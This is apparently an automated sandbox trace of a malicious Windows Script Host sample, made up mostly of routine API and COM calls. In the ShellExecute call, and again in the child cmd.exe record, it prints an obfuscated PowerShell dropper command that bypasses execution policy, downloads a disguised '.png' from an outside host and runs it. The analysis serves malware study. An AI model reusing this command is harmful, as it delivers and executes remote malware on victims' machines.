	[0048.489] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fbcd8 | out: ppv=0x2fbcd8*=0x11f420) returned 0x0
	[0048.489] ??3@YAXPEAX@Z () returned 0x1
	[0048.489] ??3@YAXPEAX@Z () returned 0x17700560001
	[0048.491] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fbcd8 | out: ppv=0x2fbcd8*=0x11f420) returned 0x0
	[0048.491] ??3@YAXPEAX@Z () returned 0x1db00170001
	[0048.491] MulDiv (nNumber=1024, nNumerator=100, nDenominator=3595) returned 28
	[0048.491] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.491] GetTickCount () returned 0x1d529
	[0048.492] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fbcd8 | out: ppv=0x2fbcd8*=0x11f420) returned 0x0
	[0048.492] ??3@YAXPEAX@Z () returned 0x1
	[0048.495] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2f7e78 | out: ppv=0x2f7e78*=0x11f420) returned 0x0
	[0048.496] MulDiv (nNumber=1057, nNumerator=100, nDenominator=3645) returned 29
	[0048.496] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.496] GetTickCount () returned 0x1d529
	[0048.497] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2f7e78 | out: ppv=0x2f7e78*=0x11f420) returned 0x0
	[0048.497] ??3@YAXPEAX@Z () returned 0x1
	[0048.497] ??3@YAXPEAX@Z () returned 0x16100a10001
	[0048.504] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2afcd8 | out: ppv=0x2afcd8*=0x11f420) returned 0x0
	[0048.504] free (_Block=0x438c50) 
	[0048.504] ??3@YAXPEAX@Z () returned 0x200620001
	[0048.504] ??3@YAXPEAX@Z () returned 0x1007a0001
	[0048.504] free (_Block=0x422460) 
	[0048.504] free (_Block=0x43adb0) 
	[0048.504] ??3@YAXPEAX@Z () returned 0x101360001
	[0048.504] ??3@YAXPEAX@Z () returned 0x1
	[0048.504] MulDiv (nNumber=981, nNumerator=100, nDenominator=3625) returned 27
	[0048.504] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.504] GetTickCount () returned 0x1d538
	[0048.508] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x284eb8 | out: ppv=0x284eb8*=0x11f420) returned 0x0
	[0048.518] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x236f38 | out: ppv=0x236f38*=0x11f420) returned 0x0
	[0048.518] free (_Block=0x43a4c0) 
	[0048.518] ??3@YAXPEAX@Z () returned 0x2000620001
	[0048.518] ??3@YAXPEAX@Z () returned 0x1f007a0001
	[0048.518] free (_Block=0x446860) 
	[0048.518] free (_Block=0x4520e0) 
	[0048.518] ??3@YAXPEAX@Z () returned 0x2201360001
	[0048.518] ??3@YAXPEAX@Z () returned 0x101600001
	[0048.518] MulDiv (nNumber=944, nNumerator=100, nDenominator=3711) returned 25
	[0048.518] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.518] GetTickCount () returned 0x1d548
	[0048.664] _resetstkoflw () returned 0x1
	[0048.665] FindResourceA (hModule=0x7fee32d0000, lpName=0x2, lpType=0x6) returned 0x320718
	[0048.665] LoadResource (hModule=0x7fee32d0000, hResInfo=0x320718) returned 0x320b6c
	[0048.665] LockResource (hResData=0x320b6c) returned 0x320b6c
	[0048.665] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x320718) returned 0x86
	[0048.665] FreeResource (hResData=0x320b6c) returned 0
	[0048.665] FindResourceA (hModule=0x7fee32d0000, lpName=0x101, lpType=0x6) returned 0x3207e8
	[0048.665] LoadResource (hModule=0x7fee32d0000, hResInfo=0x3207e8) returned 0x321c74
	[0048.665] LockResource (hResData=0x321c74) returned 0x321c74
	[0048.665] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x3207e8) returned 0xce
	[0048.665] FreeResource (hResData=0x321c74) returned 0
	[0048.665] bsearch (_Key=0x223398, _Base=0x7fee339a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee33281a0) returned 0x7fee339a410
	[0048.666] ??2@YAPEAX_K@Z () returned 0x41ec50
	[0048.666] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3077b8 | out: ppv=0x3077b8*=0x11f420) returned 0x0
	[0048.667] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0048.667] GetProcAddress (hModule=0x7fefea30000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefea4a4c4
	[0048.667] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x30cfd0 | out: lpclsid=0x30cfd0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0048.671] SysStringLen (param_1=0x0) returned 0x0
	[0048.671] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetClassObject") returned 0x7fefea62e18
	[0048.671] CoGetClassObject (in: rclsid=0x30cfd0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee3376300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30cfa0 | out: ppv=0x30cfa0*=0x3a9ca0) returned 0x0
	[0049.150] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30b270 | out: lpSystemTimeAsFileTime=0x30b270*(dwLowDateTime=0x96524ea0, dwHighDateTime=0x1d543d1)) 
	[0049.150] GetCurrentProcessId () returned 0xba4
	[0049.150] GetCurrentThreadId () returned 0xba8
	[0049.150] GetTickCount () returned 0x1d651
	[0049.151] QueryPerformanceCounter (in: lpPerformanceCount=0x30b278 | out: lpPerformanceCount=0x30b278*=17357663375) returned 1
	[0049.151] malloc (_Size=0x100) returned 0x41d860
	[0049.151] GetVersionExA (in: lpVersionInformation=0x30b050*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe31b2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xe31a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x30b050*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0049.151] GetUserDefaultLCID () returned 0x409
	[0049.151] ??2@YAPEAX_K@Z () returned 0x3a9ca0
	[0049.151] ??2@YAPEAX_K@Z () returned 0x40c080
	[0049.151] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30cdd0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0049.151] lstrlenA (lpString="\\wscript.exe") returned 12
	[0049.151] lstrlenA (lpString="C:\\Windows\\System32\\WScript.exe") returned 31
	[0049.151] _strcmpi (_Str1="\\WScript.exe", _Str2="\\wscript.exe") returned 0
	[0049.152] GetModuleHandleA (lpModuleName=0x0) returned 0xff410000
	[0049.152] GetProcAddress (hModule=0xff410000, lpProcName=0x1) returned 0xff41d7f8
	[0049.152] ??3@YAXPEAX@Z () returned 0x1b600040001
	[0049.152] malloc (_Size=0x808) returned 0x408fd0
	[0049.160] CreateErrorInfo (in: pperrinfo=0x30c070 | out: pperrinfo=0x30c070*=0x14a718) returned 0x0
	[0049.161] CErrorObject::SetGUID () returned 0x0
	[0049.161] CErrorObject::SetSource () returned 0x0
	[0049.162] LoadStringW (in: hInstance=0x7fee31a0000, uID=0x1004, lpBuffer=0x30a7b0, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0049.162] FormatMessageW (in: dwFlags=0x500, lpSource=0x14e558, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x30c080, nSize=0x0, Arguments=0x30c0f0 | out: lpBuffer="\xd380\x19") returned 0x31
	[0049.162] CErrorObject::SetDescription () returned 0x0
	[0049.162] CErrorObject::SetHelpFile () returned 0x0
	[0049.162] CErrorObject::SetHelpContext () returned 0x0
	[0049.162] QueryInterface () returned 0x0
	[0049.162] SetErrorInfo (dwReserved=0x0, perrinfo=0x14a710) returned 0x0
	[0049.162] Release () returned 0x2
	[0049.162] IUnknown:Release (This=0x14a710) returned 0x1
	[0049.162] LocalFree (hMem=0x19d380) returned 0x0
	[0049.163] IUnknown:Release (This=0x19c0f0) returned 0x1
	[0049.163] GetTickCount () returned 0x1d661
	[0049.163] bsearch (_Key=0x30d1d8, _Base=0x7fee339a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee33281a0) returned 0x7fee339a3e0
	[0049.163] ??2@YAPEAX_K@Z () returned 0x427650
	[0049.164] CLSIDFromProgIDEx (in: lpszProgID="shell.applicatiOn", lpclsid=0x30b240 | out: lpclsid=0x30b240*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0049.168] SysStringLen (param_1=0x0) returned 0x0
	[0049.168] CoGetClassObject (in: rclsid=0x30b240*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee3376300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30b210 | out: ppv=0x30b210*=0x7fefdfd8d20) returned 0x0
	[0049.168] Shell:IUnknown:QueryInterface (in: This=0x7fefdfd8d20, riid=0x7fee3376310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x30b218 | out: ppvObject=0x30b218*=0x0) returned 0x80004002
	[0049.169] Shell:IClassFactory:CreateInstance (in: This=0x7fefdfd8d20, pUnkOuter=0x0, riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x30b200 | out: ppvObject=0x30b200*=0x14a3b0) returned 0x0
	[0049.169] Shell:IUnknown:Release (This=0x7fefdfd8d20) returned 0x1
	[0049.169] Shell:IUnknown:QueryInterface (in: This=0x14a3b0, riid=0x7fee3376320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x30b1e0 | out: ppvObject=0x30b1e0*=0x14a3f0) returned 0x0
	[0049.169] ??2@YAPEAX_K@Z () returned 0x3a9cc0
	[0049.169] Shell:IObjectWithSite:SetSite (This=0x14a3f0, pUnkSite=0x3a9cc0) returned 0x0
	[0049.169] Shell:IUnknown:AddRef (This=0x3a9cc0) returned 0x2
	[0049.170] Shell:IUnknown:Release (This=0x14a3f0) returned 0x1
	[0049.170] Shell:IUnknown:QueryInterface (in: This=0x14a3b0, riid=0x7fee3376370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x30b1b8 | out: ppvObject=0x30b1b8*=0x0) returned 0x80004002
	[0049.170] Shell:IUnknown:QueryInterface (in: This=0x14a3b0, riid=0x7fee3376518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x30b130 | out: ppvObject=0x30b130*=0x0) returned 0x80004002
	[0049.170] Shell:IUnknown:QueryInterface (in: This=0x14a3b0, riid=0x7fee33764f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x30b138 | out: ppvObject=0x30b138*=0x0) returned 0x80004002
	[0049.170] Shell:IUnknown:QueryInterface (in: This=0x14a3b0, riid=0x7fee3376508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x30b140 | out: ppvObject=0x30b140*=0x0) returned 0x80004002
	[0049.170] Shell:IUnknown:QueryInterface (in: This=0x14a3b0, riid=0x7fee3376340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x30b148 | out: ppvObject=0x30b148*=0x14a3b0) returned 0x0
	[0049.170] Shell:IUnknown:Release (This=0x14a3b0) returned 0x1
	[0049.170] realloc (_Block=0x3c2b40, _Size=0x140) returned 0x381f30
	[0049.171] MulDiv (nNumber=959, nNumerator=100, nDenominator=3512) returned 27
	[0049.172] IUnknown:Release (This=0x11f420) returned 0x1
	[0049.172] GetTickCount () returned 0x1d670
	[0049.173] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0049.173] IUnknown:Release (This=0x11f420) returned 0x1
	[0049.173] GetTickCount () returned 0x1d670
	[0049.175] FindResourceA (hModule=0x7fee32d0000, lpName=0x2, lpType=0x6) returned 0x320718
	[0049.175] LoadResource (hModule=0x7fee32d0000, hResInfo=0x320718) returned 0x320b6c
	[0049.175] LockResource (hResData=0x320b6c) returned 0x320b6c
	[0049.175] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x320718) returned 0x86
	[0049.175] FreeResource (hResData=0x320b6c) returned 0
	[0049.175] FindResourceA (hModule=0x7fee32d0000, lpName=0x101, lpType=0x6) returned 0x3207e8
	[0049.175] LoadResource (hModule=0x7fee32d0000, hResInfo=0x3207e8) returned 0x321c74
	[0049.175] LockResource (hResData=0x321c74) returned 0x321c74
	[0049.175] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x3207e8) returned 0xce
	[0049.175] FreeResource (hResData=0x321c74) returned 0
	[0049.175] bsearch (_Key=0x223398, _Base=0x7fee339a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee33281a0) returned 0x7fee339a410
	[0049.176] Shell:IDispatch:GetIDsOfNames (in: This=0x14a3b0, riid=0x7fee3376360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x30b340*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x30b1f0 | out: rgDispId=0x30b1f0*=1610809345) returned 0x0
	[0049.207] Shell:IUnknown:AddRef (This=0x14a3b0) returned 0x2
	[0049.207] Shell:IDispatch:Invoke (in: This=0x14a3b0, dispIdMember=1610809345, riid=0x7fee3376360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x30b0d8*(rgvarg=([0]=0x30b0f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x30b108*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x3aa280), [2]=0x30b120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x3aa280), [3]=0x30b138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="/c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu", varVal2=0x3aa280), [4]=0x30b150*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe", varVal2=0x3aa280)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x30b618, pExcepInfo=0x30b080, puArgErr=0x30b074 | out: pDispParams=0x30b0d8*(rgvarg=([0]=0x30b0f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x30b108*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x3aa280), [2]=0x30b120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x3aa280), [3]=0x30b138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="/c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu", varVal2=0x3aa280), [4]=0x30b150*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe", varVal2=0x3aa280)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x30b618*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x7fefd330000), pExcepInfo=0x30b080*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x30b074*=0x43d2) returned 0x0
	[0049.780] Shell:IUnknown:Release (This=0x14a3b0) returned 0x1
	[0049.780] GetCurrentThreadId () returned 0xba8
	[0049.780] ISystemDebugEventFire:IsActive (This=0x1375b0) returned 0x1
	[0049.780] GetCurrentThreadId () returned 0xba8
	[0049.780] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.781] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.781] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.781] free (_Block=0x381730) 
	[0049.781] free (_Block=0x382310) 
	[0049.781] free (_Block=0x368600) 
	[0049.781] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.781] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.781] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.781] free (_Block=0x380a90) 
	[0049.781] free (_Block=0x3683e0) 
	[0049.781] ??3@YAXPEAX@Z () returned 0x1
	[0049.781] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.782] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.784] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7fefec0a1b0, dwCookie=0x100) returned 0x0
	[0049.784] IUnknown:Release (This=0x36f560) returned 0x1
	[0049.785] IUnknown:Release (This=0x11f420) returned 0x1
	[0049.785] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.785] IUnknown:Release (This=0x11f420) returned 0x0
	[0049.785] ISystemDebugEventFire:EndSession (This=0x1375b0) returned 0x0
	[0049.785] IUnknown:Release (This=0x1375b0) returned 0x1
	[0049.785] GetUserDefaultLCID () returned 0x409
	[0049.785] GetACP () returned 0x4e4
	[0049.785] IUnknown:Release (This=0x1375b0) returned 0x0
	[0049.785] free (_Block=0x36f640) 
	[0049.786] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.786] SendMessageA (hWnd=0x30212, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0049.787] SendMessageA (hWnd=0x30212, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0049.787] PostMessageA (hWnd=0x30212, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0049.789] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x30fa10*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0049.789] CloseHandle (hObject=0xd4) returned 1
	[0049.789] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.789] IUnknown:Release (This=0x12e5f0) returned 0x0
	[0049.789] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.789] IUnknown:Release (This=0x12e6a0) returned 0x0
	[0049.789] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.789] IUnknown:Release (This=0x12e750) returned 0x0
	[0049.789] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.789] IUnknown:Release (This=0x12e540) returned 0x0
	[0049.790] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.790] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.790] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.790] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.790] GetProcessHeap () returned 0x100000
	[0049.790] HeapFree (in: hHeap=0x100000, dwFlags=0x0, lpMem=0x16ae20 | out: hHeap=0x100000) returned 1
	[0049.790] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.790] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x30fa40 | out: lplpMessageFilter=0x30fa40*=0x365f80) returned 0x0
	[0049.790] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.790] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.790] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.790] CoUninitialize () 
	[0049.790] DllCanUnloadNow () returned 0x0
	[0049.790] DllCanUnloadNow () returned 0x0
	[0049.791] DllCanUnloadNow () returned 0x1
	[0049.791] free (_Block=0x41d860) 
	[0049.798] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.798] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.798] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.798] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.798] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.799] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.799] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.799] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.799] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.799] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.799] ??2@YAPEAX_K@Z () returned 0x393fe0
	[0049.799] ??3@YAXPEAX@Z () returned 0x165fff01
	[0049.799] ??3@YAXPEAX@Z () returned 0x18200050001
	[0049.799] ??3@YAXPEAX@Z () returned 0x165fff01

Thread:
	id = 37
	os_tid = 0xbb0


Thread:
	id = 38
	os_tid = 0xbb4

	[0047.808] GetClassInfoA (in: hInstance=0xff410000, lpClassName="WSH-Timer", lpWndClass=0x27dfdb0 | out: lpWndClass=0x27dfdb0) returned 0
	[0047.808] RegisterClassA (lpWndClass=0x27dfdb0) returned 0x9006ac19b
	[0047.809] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff410000, lpParam=0x365a60) returned 0x30212
	[0047.809] GetWindowLongPtrA (hWnd=0x30212, nIndex=-21) returned 0x0
	[0047.809] NtdllDefWindowProc_A (hWnd=0x30212, Msg=0x24, wParam=0x0, lParam=0x27df7a0) returned 0x0
	[0047.809] GetWindowLongPtrA (hWnd=0x30212, nIndex=-21) returned 0x0
	[0047.809] SetWindowLongPtrA (hWnd=0x30212, nIndex=-21, dwNewLong=0x365a60) returned 0x0
	[0047.809] NtdllDefWindowProc_A (hWnd=0x30212, Msg=0x81, wParam=0x0, lParam=0x27df760) returned 0x1
	[0047.810] GetWindowLongPtrA (hWnd=0x30212, nIndex=-21) returned 0x365a60
	[0047.810] NtdllDefWindowProc_A (hWnd=0x30212, Msg=0x83, wParam=0x0, lParam=0x27df7c0) returned 0x0
	[0047.819] GetWindowLongPtrA (hWnd=0x30212, nIndex=-21) returned 0x365a60
	[0047.819] NtdllDefWindowProc_A (hWnd=0x30212, Msg=0x1, wParam=0x0, lParam=0x27df760) returned 0x0
	[0047.819] SetEvent (hEvent=0xcc) returned 1
	[0047.828] GetMessageA (in: lpMsg=0x27dfd80, hWnd=0x30212, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x27dfd80) returned 0
	[0049.786] GetWindowLongPtrA (hWnd=0x30212, nIndex=-21) returned 0x365a60
	[0049.787] GetWindowLongPtrA (hWnd=0x30212, nIndex=-21) returned 0x365a60

Thread:
	id = 39
	os_tid = 0xbb8


Thread:
	id = 40
	os_tid = 0xbbc


Thread:
	id = 41
	os_tid = 0xbc0


Thread:
	id = 42
	os_tid = 0xbc4


Thread:
	id = 43
	os_tid = 0xbc8


Thread:
	id = 44
	os_tid = 0x484


Thread:
	id = 46
	os_tid = 0x808


Process:
	id = "4"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x1647c000"
	os_pid = "0x83c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "3"
	os_parent_pid = "0xba4"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 48
	os_tid = 0x844

	[0051.017] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb40 | out: lpSystemTimeAsFileTime=0x1efb40*(dwLowDateTime=0x974c3f00, dwHighDateTime=0x1d543d1)) 
	[0051.017] GetCurrentProcessId () returned 0x83c
	[0051.017] GetCurrentThreadId () returned 0x844
	[0051.017] GetTickCount () returned 0x1dcb7
	[0051.017] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb48 | out: lpPerformanceCount=0x1efb48*=17544329216) returned 1
	[0051.019] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0051.019] __set_app_type (_Type=0x1) 
